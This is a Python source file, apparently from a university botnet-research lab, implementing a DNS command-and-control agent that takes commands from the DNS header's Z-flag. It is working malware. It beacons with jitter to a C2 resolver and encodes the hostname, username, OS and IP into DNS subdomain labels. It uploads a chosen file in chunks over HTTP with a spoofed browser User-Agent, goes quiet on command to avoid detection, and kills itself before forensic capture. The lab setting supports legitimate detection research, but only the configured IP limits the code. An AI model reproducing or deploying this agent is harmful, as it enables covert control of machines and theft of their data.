"""
====================================================
 AUA CS 232/337 — Botnet Research Project
 Component: DNS Z-Flag C2 Agent
 Environment: ISOLATED VM LAB ONLY
====================================================

Teaching points implemented here (FIXES over Spinnekop reference):

1. Z=7 TERMINATE — IMPLEMENTED
   Spinnekop bug: agent-guide and z-value-protocol.md both describe
   Z=7 as "agent self-termination". The actual zValueDispatcher() in
   cmd/agent/main.go only had cases 0-3; case 7 fell through to
   default: which just printed "Z-value of 4-8 was received".
   This implementation actually terminates on Z=7.

2. REAL Z=2 ENUMERATION — IMPLEMENTED
   Spinnekop bug: internal/subdomain/generator.go was a hardcoded
   stub returning one of three fixed base64 strings via a counter.
   This implementation collects real system data: hostname, username,
   OS, IP, then encodes and sends it as a DNS subdomain label.

3. AGENT_ID IN HTTP UPLOAD — IMPLEMENTED
   Spinnekop bug: agent-guide showed POST /upload?agent_id=X&chunk=N
   but httpclient/client.go sent POST /upload?chunk=N (no agent_id)
   and hardcoded IP 172.208.51.75 as a constant.
   This implementation: agent_id derived from hostname hash, and
   server URL is fully configurable.

4. Z=1 SLEEP — CORRECT (one-hour sleep, deduplication guard)
   Correctly mirrors Spinnekop's HandleZOne() which ensures the
   one-hour sleep triggers only once, not on every beacon.

5. Z=4, Z=5, Z=6 — RESERVED but logged
   Correctly noted as reserved for future use.

6. JITTERED BEACONING — configurable Delay + Jitter
   Same algorithm as Spinnekop:
     sleep_min = Delay - (Delay * Jitter/100)
     sleep_max = Delay + (Delay * Jitter/100)
     actual    = uniform(sleep_min, sleep_max)

7. SIGNAL HANDLING — clean SIGINT/SIGTERM shutdown

Phases of operation:
  Phase 1 (DNS):  Normal beaconing + Z-command dispatch
  Phase 2 (HTTP): Activated on Z=3 — file exfil + periodic contact

Configuration is embedded at "build time" via dns_agent_config.py.
Edit configs/dns_agent_config.yaml and rebuild to change target.

Usage (lab):
  # Basic beacon to local DNS server:
  python3 dns_zflag_agent.py

  # Custom target:
  python3 dns_zflag_agent.py --resolver 192.168.100.10 --domain www.timeserversync.com.

  # Quiet mode (redirect output):
  python3 dns_zflag_agent.py > /dev/null 2>&1 &
"""

import base64
import hashlib
import json
import os
import random
import signal
import socket
import struct
import sys
import threading
import time
from typing import Optional

# ─── lab path bootstrap ──────────────────────────────────────
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))

from dns_zflag_crafter import (
    build_dns_query, apply_z_flag, read_z_flag, parse_dns_packet,
    visualize_packet, collect_system_info, encode_system_info_for_subdomain,
    discover_system_resolver, send_and_receive,
    Z_COMMAND_MAP, QTYPE_MAP,
)


# ─────────────────────────────────────────────────────────────
#  EMBEDDED AGENT CONFIGURATION
#  Mirrors cmd/agent/config.go (generated by cmd/build/main.go).
#  Edit these values before deploying. The build tool
#  (dns_agent_config.py) validates them at "compile time".
# ─────────────────────────────────────────────────────────────

AGENT_CONFIG = {
    "resolver": {
        "use_system_defaults": False,
        "ip":   "192.168.100.10",  # C2 server IP
        "port": 53,
    },
    "header": {
        "id":                  0,      # 0 = random per beacon
        "qr":                  False,  # Query
        "opcode":              "QUERY",
        "authoritative":       False,
        "truncated":           False,
        "recursion_desired":   True,
        "recursion_available": False,
        "z":                   0,      # Initial Z-value
        "rcode":               0,
    },
    "question": {
        "name":         "www.timeserversync.com.",
        "type":         "A",
        "class":        "IN",
        "std_class":    True,
        "custom_class": 1,
    },
    # HTTP exfil (activated by Z=3)
    "http": {
        "server_url": "http://192.168.100.10:8080",  # configurable
        "target_file": "dummy.zip",
        "chunk_size":  1024 * 1024,  # 1 MB chunks
    },
}

# Timing
DELAY_SEC: float  = 5.0    # base interval between beacons
JITTER_PCT: float = 50.0   # ±50% jitter


# ─────────────────────────────────────────────────────────────
#  Z=1 SLEEP STATE
#  Mirrors Spinnekop internal/zhandler/handler.go
# ─────────────────────────────────────────────────────────────

_one_hour_sleep_done = False
_sleep_lock = threading.Lock()


def handle_z_one() -> tuple:
    """
    HandleZOne: should the agent enter a one-hour sleep?
    Returns (should_sleep: bool, duration: float).
    Once the hour has been slept, subsequent Z=1 triggers return False.
    """
    global _one_hour_sleep_done
    with _sleep_lock:
        if not _one_hour_sleep_done:
            _one_hour_sleep_done = True
            return True, 3600.0
        return False, 0.0


def reset_z_one_sleep() -> None:
    """Reset the one-hour sleep guard (for testing)."""
    global _one_hour_sleep_done
    with _sleep_lock:
        _one_hour_sleep_done = False


# ─────────────────────────────────────────────────────────────
#  AGENT ID
#  Stable per-host identifier derived from hostname.
#  Used as agent_id in HTTP uploads (fixes Spinnekop hardcoded IP).
# ─────────────────────────────────────────────────────────────

def derive_agent_id() -> str:
    """Derive a stable 8-char agent ID from hostname hash."""
    try:
        hostname = socket.gethostname()
    except Exception:
        hostname = "unknown"
    h = hashlib.sha256(hostname.encode()).hexdigest()[:8].upper()
    return f"AGENT-{h}"


AGENT_ID: str = derive_agent_id()


# ─────────────────────────────────────────────────────────────
#  JITTER CALCULATION
# ─────────────────────────────────────────────────────────────

def jittered_sleep_duration() -> float:
    """
    Calculate sleep duration with jitter.
    Teaching point: bots with zero jitter have CV ≈ 0.01 (immediately
    detected by IDS Engine 2). Even 50% jitter is usually detectable.
    IDS detection drops significantly only above ~500ms eff. stddev.
    """
    jitter_range = DELAY_SEC * (JITTER_PCT / 100.0)
    min_sleep    = DELAY_SEC - jitter_range
    max_sleep    = DELAY_SEC + jitter_range
    return random.uniform(min_sleep, max_sleep)


# ─────────────────────────────────────────────────────────────
#  HTTP MODE (Z=3)
#  Fixes Spinnekop:
#    - Missing agent_id in upload URL
#    - Hardcoded server IP
#    - No configurable chunk size
# ─────────────────────────────────────────────────────────────

_file_transferred = False
_http_lock        = threading.Lock()


def contact_http_server(server_url: str) -> bool:
    """
    Verify HTTP connectivity. Returns True if server responds.
    Equivalent to Spinnekop httpclient.ContactServer().
    """
    import urllib.request
    import urllib.error
    url = server_url.rstrip("/") + "/"
    try:
        req = urllib.request.Request(url)
        req.add_header("User-Agent",
                       "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                       "AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36")
        with urllib.request.urlopen(req, timeout=10) as resp:
            body = resp.read().decode(errors="replace")
            print(f"  [http] Server response: {body[:80]}")
            return True
    except Exception as e:
        print(f"  [http] Connection failed: {e}")
        return False


def transfer_file(server_url: str, filepath: str,
                  chunk_size: int = 1024 * 1024,
                  agent_id: str = "unknown") -> None:
    """
    Transfer file to C2 HTTP server in base64 chunks.
    Fixes Spinnekop:
      - Uses configurable server_url (not hardcoded 172.208.51.75)
      - Sends agent_id in upload URL (agent-guide design, not the bug)
      - Uses configurable chunk_size
    """
    global _file_transferred
    with _http_lock:
        if _file_transferred:
            print("  [http] File already transferred — skipping")
            return

    import urllib.request
    import urllib.error

    if not os.path.exists(filepath):
        print(f"  [http] Target file not found: {filepath}")
        print("  [http] Creating dummy payload for demo...")
        with open(filepath, "wb") as f:
            f.write(b"DEMO PAYLOAD - " + os.urandom(128))

    print(f"  [http] Reading {filepath}...")
    with open(filepath, "rb") as f:
        raw_data = f.read()

    encoded     = base64.b64encode(raw_data).decode()
    total_bytes = len(raw_data)
    total_chunks= (len(encoded) + chunk_size - 1) // chunk_size

    print(f"  [http] Transferring {total_bytes} bytes in {total_chunks} chunk(s) "
          f"[agent_id={agent_id}]")

    for i in range(total_chunks):
        start = i * chunk_size
        end   = min(start + chunk_size, len(encoded))
        chunk = encoded[start:end].encode()

        # Fix: URL includes agent_id (Spinnekop's documented design)
        url = (f"{server_url.rstrip('/')}/upload"
               f"?agent_id={agent_id}&chunk={i}&total={total_chunks}")
        req = urllib.request.Request(url, data=chunk, method="POST")
        req.add_header("Content-Type", "text/plain")
        req.add_header("User-Agent",
                       "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120")

        try:
            with urllib.request.urlopen(req, timeout=30) as resp:
                resp.read()
            print(f"  [http] Sent chunk {i+1}/{total_chunks} "
                  f"({end-start} chars)")
        except Exception as e:
            print(f"  [http] Error on chunk {i}: {e}")
            return

    with _http_lock:
        _file_transferred = True
    print("  [http] ✅ File transfer complete")


# ─────────────────────────────────────────────────────────────
#  Z-VALUE DISPATCHER
#  Mirrors + FIXES Spinnekop cmd/agent/main.go zValueDispatcher()
#
#  Spinnekop bugs fixed:
#    - Z=7 TERMINATE: was default: → printed message, did nothing
#    - Z=2 ENUMERATE: called GenerateRandom() stub, hardcoded strings
#    - Z=3 HTTP_MODE: missing agent_id, hardcoded server IP
# ─────────────────────────────────────────────────────────────

class ZDispatcher:
    """
    Dispatches Z-value commands to the appropriate agent action.
    All 8 possible Z-values (0-7) are explicitly handled.
    """

    def __init__(self, config: dict, ctx):
        self.cfg = config
        self.ctx = ctx  # AgentContext
        self._use_random_subdomain = False

    def dispatch(self, z: int) -> None:
        cmd = Z_COMMAND_MAP.get(z, f"UNKNOWN({z})")
        print(f"\n  📡 Z={z} received: {cmd}")

        if z == 0:
            self._handle_continue()
        elif z == 1:
            self._handle_sleep()
        elif z == 2:
            self._handle_enumerate()
        elif z == 3:
            self._handle_http_mode()
        elif z in (4, 5, 6):
            self._handle_reserved(z)
        elif z == 7:
            self._handle_terminate()  # FIX: was default:, did nothing
        else:
            print(f"  [warn] Unrecognised Z-value {z} (out of 0-7 range)")

    # ── Z=0: CONTINUE ────────────────────────────────────────
    def _handle_continue(self) -> None:
        """No special action — continue normal beaconing."""
        print("  [z=0] Continuing normal beacon loop")

    # ── Z=1: SLEEP ───────────────────────────────────────────
    def _handle_sleep(self) -> None:
        """
        Enter extended sleep (1 hour, once).
        Teaching point: reduces detection risk when operator suspects
        the C2 is being monitored — agent goes quiet for an hour.
        """
        should_sleep, duration = handle_z_one()
        if should_sleep:
            print(f"\n  ⏰ Z=1: Entering 1-hour sleep (detection avoidance)...")
            end_time = time.time() + duration
            while time.time() < end_time and not self.ctx.shutdown_event.is_set():
                remaining = end_time - time.time()
                if int(remaining) % 300 == 0 and remaining > 1:
                    print(f"  [z=1] Sleeping... {remaining/60:.0f} min remaining")
                time.sleep(min(60.0, remaining))
            print("  [z=1] Sleep complete — resuming beaconing")
        else:
            print("  [z=1] One-hour sleep already completed this session")

    # ── Z=2: ENUMERATE ───────────────────────────────────────
    def _handle_enumerate(self) -> None:
        """
        Enable subdomain data encoding.
        FIX: Real system enumeration (was a hardcoded counter stub).

        On next beacon, hostname\\user\\os\\ip is Base64-encoded into
        the subdomain label: <b64data>.timeserversync.com
        """
        print("  [z=2] ENUMERATE: Collecting system information...")
        info = collect_system_info()
        label = encode_system_info_for_subdomain(info)
        print(f"  [z=2] System info: {info}")
        print(f"  [z=2] Encoded label ({len(label)} chars): {label}")
        print(f"  [z=2] Next beacon will use: {label}.{self._base_domain()}")
        self._use_random_subdomain = True
        self.ctx.enumeration_label = label

    # ── Z=3: HTTP_MODE ───────────────────────────────────────
    def _handle_http_mode(self) -> None:
        """
        Switch to HTTPS exfil channel.
        FIX: server URL is configurable, agent_id sent in upload URL.

        Steps:
          1. Verify HTTP connectivity
          2. Transfer target file in chunks
          3. Continue HTTP beaconing (periodic contact)
        """
        http_cfg = self.cfg.get("http", {})
        url      = http_cfg.get("server_url", "http://127.0.0.1:8080")
        filepath = http_cfg.get("target_file", "dummy.zip")
        chunk_sz = http_cfg.get("chunk_size", 1024 * 1024)

        print(f"  [z=3] Testing HTTP connectivity → {url}")
        if contact_http_server(url):
            print("  [z=3] HTTP server reachable — switching to HTTP mode")
            # Transfer file with agent_id (fixes Spinnekop gap)
            threading.Thread(
                target=transfer_file,
                args=(url, filepath, chunk_sz, AGENT_ID),
                daemon=True,
            ).start()
            self.ctx.http_mode = True
            self.ctx.http_url  = url
        else:
            print("  [z=3] HTTP server unreachable — staying in DNS mode")

    # ── Z=4, Z=5, Z=6: RESERVED ─────────────────────────────
    def _handle_reserved(self, z: int) -> None:
        """
        Reserved for future commands.
        Teaching point: 3 Z-bits give 8 values total. 4 are defined,
        3 are reserved. Attackers could extend the protocol here.
        """
        print(f"  [z={z}] Reserved command — no action (future use)")

    # ── Z=7: TERMINATE ───────────────────────────────────────
    def _handle_terminate(self) -> None:
        """
        FIX: Spinnekop's zValueDispatcher hit default: for Z=7.
        This implementation actually terminates the agent.

        Teaching point: Z=7 allows the operator to remotely kill
        agents before forensic capture — emergency extraction.
        """
        print("\n  🛑 Z=7: TERMINATE received — agent shutting down cleanly")
        print("  [z=7] Stopping all network activity...")
        self.ctx.shutdown_event.set()

    def _base_domain(self) -> str:
        return self.cfg.get("question", {}).get("name", "c2domain.com.").lstrip("www.")

    def current_subdomain(self) -> Optional[str]:
        if self._use_random_subdomain:
            return getattr(self.ctx, "enumeration_label", None)
        return None


# ─────────────────────────────────────────────────────────────
#  AGENT CONTEXT (shared state across the beacon loop)
# ─────────────────────────────────────────────────────────────

class AgentContext:
    def __init__(self):
        self.shutdown_event  = threading.Event()
        self.http_mode       = False
        self.http_url        = ""
        self.enumeration_label: Optional[str] = None
        self.beacon_count    = 0
        self.last_z_value    = 0
        self.last_z_command  = "CONTINUE"


# ─────────────────────────────────────────────────────────────
#  MAIN BEACON LOOP
# ─────────────────────────────────────────────────────────────

def run_agent(config: Optional[dict] = None) -> None:
    """
    Main agent loop.
    Mirrors Spinnekop cmd/agent/main.go but with all fixes applied.
    """
    cfg = config or AGENT_CONFIG
    ctx = AgentContext()
    dispatcher = ZDispatcher(cfg, ctx)

    # Determine resolver
    r_cfg = cfg.get("resolver", {})
    use_sys = r_cfg.get("use_system_defaults", False)
    r_ip    = r_cfg.get("ip", "127.0.0.1")
    r_port  = r_cfg.get("port", 53)

    if use_sys:
        r_ip, r_port = discover_system_resolver()
        print(f"[agent] Using system resolver: {r_ip}:{r_port}")
    else:
        print(f"[agent] Using resolver: {r_ip}:{r_port}")

    print(f"[agent] ID: {AGENT_ID}")
    print(f"[agent] Beacon interval: {DELAY_SEC}s ±{JITTER_PCT}%")
    print(f"[agent] Starting DNS beacon loop (Ctrl+C to stop)...\n")

    h_cfg = cfg.get("header", {})
    q_cfg = cfg.get("question", {})
    http_cfg = cfg.get("http", {})

    # ── Main DNS beacon loop ──────────────────────────────────
    while not ctx.shutdown_event.is_set():

        # Build query name (Z=2 uses encoded subdomain)
        sub = dispatcher.current_subdomain()
        base_name = q_cfg.get("name", "www.timeserversync.com.")
        if sub:
            # Strip leading "www." and prepend the encoded label
            bare = base_name.lstrip("www.")
            qname = f"{sub}.{bare}"
        else:
            qname = base_name

        # Build DNS packet
        try:
            pkt = bytearray(build_dns_query(
                qname       = qname,
                qtype       = q_cfg.get("type", "A"),
                qclass      = q_cfg.get("class", "IN"),
                transaction_id = h_cfg.get("id", 0),
                qr          = h_cfg.get("qr", False),
                opcode      = h_cfg.get("opcode", "QUERY"),
                aa          = h_cfg.get("authoritative", False),
                tc          = h_cfg.get("truncated", False),
                rd          = h_cfg.get("recursion_desired", True),
                ra          = h_cfg.get("recursion_available", False),
                z_value     = h_cfg.get("z", 0),
                rcode       = h_cfg.get("rcode", 0),
                std_class   = q_cfg.get("std_class", True),
                custom_class= q_cfg.get("custom_class", 1),
            ))
        except Exception as e:
            print(f"[agent] Packet build error: {e}")
            time.sleep(jittered_sleep_duration())
            continue

        visualize_packet(bytes(pkt), f"Beacon #{ctx.beacon_count + 1} → {qname}")

        # Send and receive
        try:
            resp_bytes = send_and_receive(bytes(pkt), r_ip, r_port)
        except socket.timeout:
            print(f"  [agent] No response (timeout)")
            resp_bytes = None
        except Exception as e:
            print(f"  [agent] Network error: {e}")
            resp_bytes = None

        z_value = 0
        if resp_bytes:
            # Display response
            visualize_packet(resp_bytes, "Response")

            # Parse for display
            parsed = parse_dns_packet(resp_bytes)
            answers = parsed.get("answers", [])
            if answers:
                for a in answers:
                    print(f"  [dns] {a.get('name','')} → {a.get('rdata','')} "
                          f"(TTL={a.get('ttl',0)})")

            # Extract Z-value
            if len(resp_bytes) >= 4:
                z_value = read_z_flag(resp_bytes)
                ctx.last_z_value   = z_value
                ctx.last_z_command = Z_COMMAND_MAP.get(z_value, "?")

            # Dispatch command
            dispatcher.dispatch(z_value)

        ctx.beacon_count += 1

        if ctx.shutdown_event.is_set():
            break

        # HTTP mode loop (Z=3 activated)
        if ctx.http_mode:
            _run_http_loop(ctx, http_cfg)
            break

        # Sleep with jitter
        duration = jittered_sleep_duration()

        # Z=1 may override sleep duration
        if z_value == 1:
            should_sleep, dur = handle_z_one()
            if should_sleep:
                print(f"\n  ⏰ Extended sleep: {dur/3600:.1f} hour(s)")
                duration = dur

        print(f"\n  💤 Sleeping {duration:.2f}s...")
        _interruptible_sleep(duration, ctx.shutdown_event)

    print("\n[agent] Beacon loop exited.")


def _run_http_loop(ctx: AgentContext, http_cfg: dict) -> None:
    """
    HTTP mode: periodic contact after Z=3 activation.
    Teaching point: HTTP traffic blends with normal web activity;
    harder to distinguish from legitimate browsing patterns.
    """
    url = ctx.http_url
    print(f"\n[agent] Entered HTTP mode — contacting {url}")
    while not ctx.shutdown_event.is_set():
        contact_http_server(url)
        duration = jittered_sleep_duration()
        print(f"  💤 HTTP mode: sleeping {duration:.2f}s...")
        _interruptible_sleep(duration, ctx.shutdown_event)
    print("[agent] HTTP loop exited.")


def _interruptible_sleep(duration: float, stop_event: threading.Event) -> None:
    """Sleep in small increments, checking stop_event each tick."""
    end = time.time() + duration
    while time.time() < end and not stop_event.is_set():
        time.sleep(min(0.5, end - time.time()))


# ─────────────────────────────────────────────────────────────
#  CLI
# ─────────────────────────────────────────────────────────────

if __name__ == "__main__":
    import argparse, copy

    ap = argparse.ArgumentParser(description="DNS Z-Flag Agent")
    ap.add_argument("--resolver", metavar="IP",  help="DNS resolver IP")
    ap.add_argument("--port",  type=int, default=53, help="DNS port")
    ap.add_argument("--domain", metavar="FQDN", help="C2 domain (FQDN)")
    ap.add_argument("--http-url", metavar="URL", help="HTTP C2 base URL")
    ap.add_argument("--target-file", metavar="PATH",
                    help="File to exfil on Z=3", default="dummy.zip")
    ap.add_argument("--delay",  type=float, default=DELAY_SEC)
    ap.add_argument("--jitter", type=float, default=JITTER_PCT)
    ap.add_argument("--no-visualize", action="store_true",
                    help="Suppress packet hex dumps")
    args = ap.parse_args()

    # Apply overrides
    DELAY_SEC  = args.delay
    JITTER_PCT = args.jitter

    cfg = copy.deepcopy(AGENT_CONFIG)
    if args.resolver:
        cfg["resolver"]["ip"]   = args.resolver
        cfg["resolver"]["port"] = args.port
    if args.domain:
        cfg["question"]["name"] = args.domain
    if args.http_url:
        cfg["http"]["server_url"] = args.http_url
    if args.target_file:
        cfg["http"]["target_file"] = args.target_file

    # Signal handling
    shutdown = threading.Event()

    def _sig(sig, frame):
        print("\n\n  🛑 Shutdown signal received")
        shutdown.set()
        sys.exit(0)
    signal.signal(signal.SIGINT,  _sig)
    signal.signal(signal.SIGTERM, _sig)

    run_agent(cfg)
